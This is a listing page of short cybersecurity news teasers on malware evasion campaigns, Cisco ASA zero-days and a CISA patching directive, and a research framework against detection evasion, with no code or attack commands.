Topic: evasion techniques
-
MonsterRAT: Stealthy Malware Threatens Windows Systems
A sophisticated phishing campaign distributes the previously undocumented MonsterRAT malware, which targets Windows systems and grants attackers full administrative control through a multi-stage infection process. The attack uses phishing emails disguised as business correspondence to deliver the...
Read More » -
Defeat Malware Evasion with New Framework
Malware creators use subtle code modifications to evade AI detection systems while preserving harmful functionality, but a new framework called ERDALT offers a countermeasure by focusing on robust features. ERDALT, developed by Inria and CISPA, trains on adversarial examples and prioritizes stabl...
Read More » -
ArcaneDoor Hackers Renew Cisco Attacks with Stealthy Campaign
A sophisticated cyber-espionage campaign by the ArcaneDoor threat actor has compromised older Cisco ASA firewalls using zero-day vulnerabilities to implant malware and steal data. The attackers used advanced evasion techniques and modified the ROM Monitor to ensure persistence, but only older mod...
Read More » -
SquidLoader Malware Threatens Hong Kong Finance Sector
SquidLoader is a sophisticated new malware targeting Hong Kong financial institutions, using stealthy evasion techniques to deliver Cobalt Strike Beacon payloads undetected. The attack starts with spear-phishing emails containing disguised RAR archives, deploying multi-stage infection processes l...
Read More » -
Chaos Ransomware Strikes: New Wave of Cyberattacks
The ransomware group Chaos employs aggressive double extortion tactics and psychological pressure, offering rewards for compliance while escalating threats like data leaks and DDoS attacks for non-payment. Chaos targets organizations globally, particularly in the U.S., UK, New Zealand, and India,...
Read More » -
North Korean Hackers Exploit Seoul Intelligence Files
A sophisticated spear-phishing campaign, attributed to North Korean-linked APT37, targeted South Korean intelligence and government personnel using deceptively authentic documents as bait. The operation unfolded in two phases: one distributing a malicious file disguised as a trusted newsletter to...
Read More » -
Active Attacks Exploit Cisco ASA Zero-Day Flaws
A coordinated international cybersecurity alert warns of active attacks exploiting zero-day vulnerabilities in Cisco ASA and FTD software, attributed to a sophisticated, likely state-sponsored threat actor linked to previous ArcaneDoor campaigns. Two critical vulnerabilities (CVE-2025-20362 and C...
Read More » -
CISA Mandates Urgent Patching for Actively Exploited Cisco Zero-Day Flaws
CISA has issued an emergency directive requiring U.S. federal agencies to immediately address two actively exploited critical vulnerabilities (CVE-2025-20333 and CVE-2025-20362) in Cisco ASA and FTD firewalls, which allow unauthenticated remote code execution. Agencies must inventory all affected...
Read More » -
APT36 Hackers Use Linux .desktop Files to Deploy Malware in Latest Campaign
A cyber espionage campaign by Pakistani-linked group APT36 is targeting Indian government and defense sectors using malicious Linux .desktop files disguised as PDFs in phishing emails. The attack involves weaponized .desktop files that execute hidden commands to download and run a Go-based malwar...
Read More »